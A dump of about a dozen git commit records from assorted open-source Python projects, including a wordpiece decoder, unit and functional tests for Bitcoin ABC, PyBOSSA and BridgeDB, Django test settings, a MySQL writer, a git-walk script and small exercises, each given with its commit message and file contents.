6b81d938ed99a943e8e81816b9a013b488d4dfd8 | Add util.py to decode wordpiece ids in Transformer | lcy-seso/models,PaddlePaddle/models,lcy-seso/models,PaddlePaddle/models,PaddlePaddle/models,kuke/models,qingqing01/models,kuke/models,kuke/models,kuke/models,lcy-seso/models,qingqing01/models,qingqing01/models | fluid/neural_machine_translation/transformer/util.py | fluid/neural_machine_translation/transformer/util.py | import sys
import re
import six
import unicodedata
# Regular expression for unescaping token strings.
# '\u' is converted to '_'
# '\\' is converted to '\'
# '\213;' is converted to unichr(213)
# Inverse of escaping.
_UNESCAPE_REGEX = re.compile(r"\\u|\\\\|\\([0-9]+);")
# This set contains all letter and number characters.
_ALPHANUMERIC_CHAR_SET = set(
six.unichr(i) for i in range(sys.maxunicode)
if (unicodedata.category(six.unichr(i)).startswith("L") or
unicodedata.category(six.unichr(i)).startswith("N")))
def tokens_to_ustr(tokens):
"""
Convert a list of tokens to a unicode string.
"""
token_is_alnum = [t[0] in _ALPHANUMERIC_CHAR_SET for t in tokens]
ret = []
for i, token in enumerate(tokens):
if i > 0 and token_is_alnum[i - 1] and token_is_alnum[i]:
ret.append(u" ")
ret.append(token)
return "".join(ret)
def subtoken_ids_to_tokens(subtoken_ids, vocabs):
"""
Convert a list of subtoken(wordpiece) ids to a list of tokens.
"""
concatenated = "".join(
[vocabs.get(subtoken_id, u"") for subtoken_id in subtoken_ids])
split = concatenated.split("_")
ret = []
for t in split:
if t:
unescaped = unescape_token(t + "_")
if unescaped:
ret.append(unescaped)
return ret
def unescape_token(escaped_token):
"""
Inverse of encoding escaping.
"""
def match(m):
if m.group(1) is None:
return u"_" if m.group(0) == u"\\u" else u"\\"
try:
return six.unichr(int(m.group(1)))
except (ValueError, OverflowError) as _:
return u"\u3013" # Unicode for undefined character.
trimmed = escaped_token[:-1] if escaped_token.endswith(
"_") else escaped_token
return _UNESCAPE_REGEX.sub(match, trimmed)
def subword_ids_to_str(ids, vocabs):
"""
Convert a list of subtoken(word piece) ids to a native string.
Refer to SubwordTextEncoder in Tensor2Tensor.
"""
return tokens_to_ustr(subtoken_ids_to_tokens(ids, vocabs)).decode("utf-8")
| apache-2.0 | Python |
|
e69da5fb3550703c466cd8ec0e084e131fb97150 | add first small and simple tests about the transcoder manager | furbrain/Coherence,ismaelgaudioso/Coherence,opendreambox/python-coherence,ismaelgaudioso/Coherence,unintended/Cohen,sreichholf/python-coherence,coherence-project/Coherence,furbrain/Coherence,sreichholf/python-coherence,opendreambox/python-coherence,coherence-project/Coherence,unintended/Cohen | coherence/test/test_transcoder.py | coherence/test/test_transcoder.py |
from twisted.trial.unittest import TestCase
from coherence.transcoder import TranscoderManager
from coherence.transcoder import (PCMTranscoder, WAVTranscoder, MP3Transcoder,
MP4Transcoder, MP2TSTranscoder, ThumbTranscoder)
known_transcoders = [PCMTranscoder, WAVTranscoder, MP3Transcoder, MP4Transcoder,
MP2TSTranscoder, ThumbTranscoder]
# move this into the implementation to allow easier overwriting
def getuniquename(transcoder_class):
return getattr(transcoder_class, 'id')
class TranscoderTestMixin(object):
def setUp(self):
self.manager = TranscoderManager()
def tearDown(self):
# as it is a singleton ensuring that we always get a clean
# and fresh one is tricky and hacks the internals
TranscoderManager._instance = None
del self.manager
class TestTranscoderManagerSingletony(TranscoderTestMixin, TestCase):
def test_is_really_singleton(self):
#FIXME: singleton tests should be outsourced some when
old_id = id(self.manager)
new_manager = TranscoderManager()
self.assertEquals(old_id, id(new_manager))
class TestTranscoderAutoloading(TranscoderTestMixin, TestCase):
def setUp(self):
self.manager = None
def test_is_loading_all_known_transcoders(self):
self.manager = TranscoderManager()
for klass in known_transcoders:
self.assertEquals(self.manager.transcoders[getuniquename(klass)], klass)
| mit | Python |
|
d1958e834182fd7d43b97ea17057cc19dff21ca1 | Test addr response caching | Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc | test/functional/p2p_getaddr_caching.py | test/functional/p2p_getaddr_caching.py | #!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test addr response caching"""
import time
from test_framework.messages import (
CAddress,
NODE_NETWORK,
msg_addr,
msg_getaddr,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
MAX_ADDR_TO_SEND = 1000
def gen_addrs(n):
addrs = []
for i in range(n):
addr = CAddress()
addr.time = int(time.time())
addr.nServices = NODE_NETWORK
# Use first octets to occupy different AddrMan buckets
first_octet = i >> 8
second_octet = i % 256
addr.ip = "{}.{}.1.1".format(first_octet, second_octet)
addr.port = 8333
addrs.append(addr)
return addrs
class AddrReceiver(P2PInterface):
def __init__(self):
super().__init__()
self.received_addrs = None
def get_received_addrs(self):
with p2p_lock:
return self.received_addrs
def on_addr(self, message):
self.received_addrs = []
for addr in message.addrs:
self.received_addrs.append(addr.ip)
def addr_received(self):
return self.received_addrs is not None
class AddrTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def run_test(self):
self.log.info('Create connection that sends and requests addr '
'messages')
addr_source = self.nodes[0].add_p2p_connection(P2PInterface())
msg_send_addrs = msg_addr()
self.log.info('Fill peer AddrMan with a lot of records')
# Since these addrs are sent from the same source, not all of them
# will be stored, because we allocate a limited number of AddrMan
# buckets per addr source.
total_addrs = 10000
addrs = gen_addrs(total_addrs)
for i in range(int(total_addrs / MAX_ADDR_TO_SEND)):
msg_send_addrs.addrs = addrs[i * MAX_ADDR_TO_SEND:
(i + 1) * MAX_ADDR_TO_SEND]
addr_source.send_and_ping(msg_send_addrs)
responses = []
self.log.info('Send many addr requests within short time to receive')
N = 5
cur_mock_time = int(time.time())
for i in range(N):
addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
addr_receiver.send_and_ping(msg_getaddr())
# Trigger response
cur_mock_time += 5 * 60
self.nodes[0].setmocktime(cur_mock_time)
addr_receiver.wait_until(addr_receiver.addr_received)
responses.append(addr_receiver.get_received_addrs())
for response in responses[1:]:
assert_equal(response, responses[0])
assert(len(response) < MAX_ADDR_TO_SEND)
cur_mock_time += 3 * 24 * 60 * 60
self.nodes[0].setmocktime(cur_mock_time)
self.log.info('After time passed, see a new response to addr request')
last_addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
last_addr_receiver.send_and_ping(msg_getaddr())
# Trigger response
cur_mock_time += 5 * 60
self.nodes[0].setmocktime(cur_mock_time)
last_addr_receiver.wait_until(last_addr_receiver.addr_received)
# new response is different
assert(set(responses[0]) !=
set(last_addr_receiver.get_received_addrs()))
if __name__ == '__main__':
AddrTest().main()
| mit | Python |
|
9698e473615233819f886c5c51220d3a213b5545 | Add initial prototype | nok/git-walk,nok/git-walk | script.py | script.py | #!/usr/bin/env python
import sys
import subprocess as subp
cmd = '' if len(sys.argv) <= 1 else str(sys.argv[1])
if cmd in ['prev', 'next']:
log = subp.check_output(['git', 'rev-list', '--all']).strip()
log = [line.strip() for line in log.split('\n')]
pos = subp.check_output(['git', 'rev-parse', 'HEAD']).strip()
idx = log.index(pos)
# Next commit:
if cmd == 'next':
if idx > 0:
subp.call(['git', 'checkout', log[idx - 1]])
else:
print("You're already on the latest commit.")
# Previous commit:
else:
if idx + 1 <= len(log) - 1:
subp.call(['git', 'checkout', 'HEAD^'])
else:
print("You're already on the first commit.")
else:
print('Usage: git walk prev|next')
| mit | Python |
|
6500bc2682aeecb29c79a9ee9eff4e33439c2b49 | Add verifica_diff script | palcu/infooltenia,palcu/infooltenia,palcu/infooltenia,palcu/infooltenia,palcu/infooltenia,palcu/infooltenia | conjectura/teste/verifica_diff.py | conjectura/teste/verifica_diff.py | from sh import cp, rm, diff
import sh
import os
SURSA_VERIFICATA = 'conjectura-inturi.cpp'
cp('../' + SURSA_VERIFICATA, '.')
os.system('g++ ' + SURSA_VERIFICATA)
filename = 'grader_test'
for i in range(1, 11):
print 'Testul ', i
cp(filename + str(i) + '.in', 'conjectura.in')
os.system('./a.out')
print diff('conjectura.out', filename + str(i) + '.ok')
for extension in ['in', 'out']:
rm('conjectura.' + extension)
rm(SURSA_VERIFICATA)
rm('a.out')
| mit | Python |
|
5d769d651947384e18e4e9c21a10f86762a3e950 | add more tests | PyBossa/pybossa,Scifabric/pybossa,Scifabric/pybossa,PyBossa/pybossa | test/test_api/test_api_announcement.py | test/test_api/test_api_announcement.py | # -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2017 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
import json
from default import db, with_context
from test_api import TestAPI
from factories import AnnouncementFactory
from factories import UserFactory, HelpingMaterialFactory, ProjectFactory
from pybossa.repositories import AnnouncementRepository
from mock import patch
announcement_repo = AnnouncementRepository(db)
class TestAnnouncementAPI(TestAPI):
@with_context
def test_query_announcement(self):
"""Test API query for announcement endpoint works"""
owner = UserFactory.create()
user = UserFactory.create()
# project = ProjectFactory(owner=owner)
announcements = AnnouncementFactory.create_batch(9)
announcement = AnnouncementFactory.create()
# As anon
url = '/announcements/'
res = self.app_get_json(url)
data = json.loads(res.data)
assert len(data['announcements']) == 10, data
| agpl-3.0 | Python |
|
18b22600f94be0e6fedd6bb202753736d61c85e6 | Add alternative settings to make test debugging easier | jfterpstra/bluebottle,jfterpstra/bluebottle,onepercentclub/bluebottle,jfterpstra/bluebottle,onepercentclub/bluebottle,jfterpstra/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | runserver_settings.py | runserver_settings.py | from django.conf import global_settings
import os
SITE_ID = 1
TIME_ZONE = 'Europe/Amsterdam'
PROJECT_ROOT = os.path.join(os.path.dirname(__file__))
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'media')
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'assets')
STATICI18N_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')
STATICFILES_DIRS = (
(os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')),
)
STATIC_URL = '/static/assets/'
MEDIA_URL = '/static/media/'
COMPRESS_ENABLED = False # = True: causes tests to be failing for some reason
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
# django-compressor staticfiles
'compressor.finders.CompressorFinder',
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'test.db'),
# 'NAME': ':memory:',
}
}
SECRET_KEY = '$311#0^-72hr(uanah5)+bvl4)rzc*x1&b)6&fajqv_ae6v#zy'
INSTALLED_APPS = (
# Django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
#3rp party apps
'compressor',
'registration',
'rest_framework',
'social_auth',
'south',
'taggit',
'templatetag_handlebars',
# Bluebottle apps
'bluebottle.accounts',
'bluebottle.common',
'bluebottle.geo',
)
MIDDLEWARE_CLASSES = [
# Have a middleware to make sure old cookies still work after we switch to domain-wide cookies.
'bluebottle.bluebottle_utils.middleware.SubDomainSessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# https://docs.djangoproject.com/en/1.4/ref/clickjacking/
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.transaction.TransactionMiddleware',
]
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'templates'),
)
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'apptemplates.Loader', # extend AND override templates
]
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
# Makes the 'request' variable (the current HttpRequest) available in templates.
'django.core.context_processors.request',
'django.core.context_processors.i18n'
)
AUTH_USER_MODEL = 'accounts.BlueBottleUser'
ROOT_URLCONF = 'bluebottle.urls'
SESSION_COOKIE_NAME = 'bb-session-id'
# Django-registration settings
ACCOUNT_ACTIVATION_DAYS = 4
HTML_ACTIVATION_EMAIL = True # Note this setting is from our forked version.
SOUTH_TESTS_MIGRATE = False # Make south shut up during tests
SELENIUM_TESTS = True
SELENIUM_WEBDRIVER = 'phantomjs' # Can be any of chrome, firefox, phantomjs
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEBUG = True
TEMPLATE_DEBUG = True
USE_EMBER_STYLE_ATTRS = True | bsd-3-clause | Python |
|
a1f411be91a9db2193267de71eb52db2f334641b | add a file that prints hello lesley | ctsit/J.O.B-Training-Repo-1 | hellolesley.py | hellolesley.py | #This is my hello world program to say hi to Lesley
print 'Hello Lesley'
| apache-2.0 | Python |
|
03b80665f6db39002e0887ddf56975f6d31cc767 | Create __init__.py | shyampurk/m2m-traffic-corridor,shyampurk/m2m-traffic-corridor,shyampurk/m2m-traffic-corridor | server/__init__.py | server/__init__.py | mit | Python |
||
33581b5a2f9ca321819abfd7df94eb5078ab3e7c | Add domain.Box bw compatibility shim w/deprecation warning | Alwnikrotikz/py-lepton,AlanZatarain/py-lepton,jmichelsen/py-lepton,jmichelsen/py-lepton,tectronics/py-lepton,AlanZatarain/py-lepton,tectronics/py-lepton,Alwnikrotikz/py-lepton | lepton/domain.py | lepton/domain.py | #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
"""Domain abstract base class"""
def generate(self):
"""Return a point within the domain as a 3-tuple. For domains with a
non-zero volume, 'point in domain' is guaranteed to return true.
"""
raise NotImplementedError
def __contains__(self, point):
"""Return true if point is inside the domain, false if not."""
raise NotImplementedError
def intersect(self, start_point, end_point):
"""For the line segment defined by the start and end point specified
(coordinate 3-tuples), return the point closest to the start point
where the line segment intersects surface of the domain, and the
surface normal unit vector at that point as a 2-tuple. If the line
segment does not intersect the domain, return the 2-tuple (None,
None).
Only 2 or 3 dimensional domains may be intersected.
Note performance is more important than absolute accuracy with this
method, so approximations are acceptable.
"""
raise NotImplementedError
def Box(*args, **kw):
"""Axis-aligned box domain (same as AABox for now)
WARNING: Deprecated, use AABox instead. This domain will mean something different
in future versions of lepton
"""
import warnings
warnings.warn("lepton.domain.Box is deprecated, use AABox instead. "
"This domain class will mean something different in future versions of lepton",
stacklevel=2)
return AABox(*args, **kw)
| #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
"""Domain abstract base class"""
def generate(self):
"""Return a point within the domain as a 3-tuple. For domains with a
non-zero volume, 'point in domain' is guaranteed to return true.
"""
raise NotImplementedError
def __contains__(self, point):
"""Return true if point is inside the domain, false if not."""
raise NotImplementedError
def intersect(self, start_point, end_point):
"""For the line segment defined by the start and end point specified
(coordinate 3-tuples), return the point closest to the start point
where the line segment intersects surface of the domain, and the
surface normal unit vector at that point as a 2-tuple. If the line
segment does not intersect the domain, return the 2-tuple (None,
None).
Only 2 or 3 dimensional domains may be intersected.
Note performance is more important than absolute accuracy with this
method, so approximations are acceptable.
"""
raise NotImplementedError
| mit | Python |
03fdc41437f96cb1d6ba636c3a5d8c5dc15430b1 | Create requirements.py | pesaply/sarafu,Hojalab/sarafu,pesaply/sarafu,Hojalab/sarafu | requirements.py | requirements.py | mit | Python |
||
ab99f855f708dec213c9eea1489643c01526e0b0 | Add unittests for bridgedb.parse.versions module. | pagea/bridgedb,pagea/bridgedb | lib/bridgedb/test/test_parse_versions.py | lib/bridgedb/test/test_parse_versions.py | # -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <[email protected]>
# please also see AUTHORS file
# :copyright: (c) 2014, The Tor Project, Inc.
# (c) 2014, Isis Lovecruft
# :license: see LICENSE for licensing information
#_____________________________________________________________________________
"""Unittests for :mod:`bridgedb.parse.versions`."""
from __future__ import print_function
from twisted.trial import unittest
from bridgedb.parse import versions
class ParseVersionTests(unittest.TestCase):
"""Unitests for :class:`bridgedb.parse.versions.Version`."""
def test_Version_with_bad_delimiter(self):
"""Test parsing a version number which uses '-' as a delimiter."""
self.assertRaises(versions.InvalidVersionStringFormat,
versions.Version, '2-6-0', package='tor')
def test_Version_really_long_version_string(self):
"""Parsing a version number which is way too long should raise
an IndexError which is ignored.
"""
v = versions.Version('2.6.0.0.beta', package='tor')
self.assertEqual(v.prerelease, 'beta')
self.assertEqual(v.major, 6)
def test_Version_string(self):
"""Test converting a valid Version object into string form."""
v = versions.Version('0.2.5.4', package='tor')
self.assertEqual(v.base(), '0.2.5.4')
| bsd-3-clause | Python |
|
caef0059d803fc885d268ccd66b9c70a0b2ab129 | Create Exercise4_VariablesAndNames.py | hrahadiant/LearnPythonTheHardWay | Exercise4_VariablesAndNames.py | Exercise4_VariablesAndNames.py | # Exercise 4 : Variables and Names
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_cars = passengers / cars_driven
print("There are", cars, "cars available.")
print("There are only", drivers, "drivers available.")
print("There will be", cars_not_driven, "empty cars today.")
print("We can transport", carpool_capacity, "people today.")
print("We have", passengers, "to carpool today.")
print("We need to put about", average_passengers_per_cars, "in each car.")
| mit | Python |
|
7b00bbb576df647a74b47b601beff02af308d16a | 添加 输出到 MySQL | ibbd-dev/ibbdETL,ibbd-dev/ibbdETL | src/target/mysql.py | src/target/mysql.py | # -*- coding: utf-8 -*-
# Author: mojiehua
# Email: [email protected]
# Created Time: 2017-07-18 17:38:44
import pymysql
class Target:
"""
写入 MySQL 数据库,需要预先创建表,字段应与输出的字段一致
支持的配置参数 params 如下:
host: MySQL 主机地址
port: MySQL 端口(可选参数,默认3306)
user: 用户名
passwd: 密码
db: 数据库
table: 表名
charset: 字符集(可选参数,默认设置成UTF8)
配置示例
params:
host: 127.0.0.1
port: 3306
user: root
passwd: root
db: test
charset: utf8
table: testmysql
batch: true
batchNum: 1000
"""
params = {}
def __init__(self, params):
params['charset'] = params['charset'] if 'charset' in params else 'utf8'
params['port'] = int(params['port']) if 'port' in params else 3306
self.params = params
self._host = params['host']
self._port = params['port']
self._user = params['user']
self._passwd = params['passwd']
self._db = params['db']
self._charset = params['charset']
self._table = params['table']
self._conn = None
self._cursor = None
def get_conn(self):
try:
conn = pymysql.connect(host = self._host,
port = self._port,
user = self._user,
passwd = self._passwd,
db = self._db,
charset = self._charset)
return conn
except Exception as e:
print('数据库连接出错',e)
raise e
def write(self, row):
if self._conn is None:
self._conn = self.get_conn()
self._cursor = self._conn.cursor()
sql = self.constructSQLByRow(row)
try:
self._cursor.execute(sql,(list(row.values())))
self._conn.commit()
except Exception as e:
print(e)
print('插入数据库出错,忽略此条记录',row)
def constructSQLByRow(self,row):
fields = ','.join(row.keys())
values = ','.join(['%s' for _ in row.values()])
sql = '''INSERT INTO {tb}({column}) VALUES ({values}) '''.format(tb=self._table,column=fields,values=values)
return sql
def batch(self, rows):
if self._conn is None:
self._conn = self.get_conn()
self._cursor = self._conn.cursor()
for row in rows:
try:
sql = self.constructSQLByRow(row)
self._cursor.execute(sql,(list(row.values())))
except Exception as e:
print(e)
print('插入数据库出错,忽略此条记录',row)
self._conn.commit()
def __del__(self):
if self._cursor:
self._cursor.close()
if self._conn:
self._conn.close()
| apache-2.0 | Python |
|
1a4db50c848a3e7bb1323ae9e6b26c884187c575 | Add my fibonacci sequence homework. | bigfatpanda-training/pandas-practical-python-primer,bigfatpanda-training/pandas-practical-python-primer | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | def even_fibonacci_sum(a:int,b:int,max:int) -> int:
temp = 0
sum = 0
while (b <= max):
if (b%2 == 0):
sum += b
temp = a + b
a = b
b = temp
print(sum)
even_fibonacci_sum(1,2,4000000) | artistic-2.0 | Python |
|
f14c483283984b793f1209255e059d7b9deb414c | Add in the db migration | MaxPresman/cfapi,smalley/cfapi,smalley/cfapi,codeforamerica/cfapi,codeforamerica/cfapi,MaxPresman/cfapi,MaxPresman/cfapi,smalley/cfapi | migrations/versions/8081a5906af_.py | migrations/versions/8081a5906af_.py | """empty message
Revision ID: 8081a5906af
Revises: 575d8824e34c
Create Date: 2015-08-25 18:04:56.738898
"""
# revision identifiers, used by Alembic.
revision = '8081a5906af'
down_revision = '575d8824e34c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('organization', sa.Column('member_count', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('organization', 'member_count')
### end Alembic commands ###
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.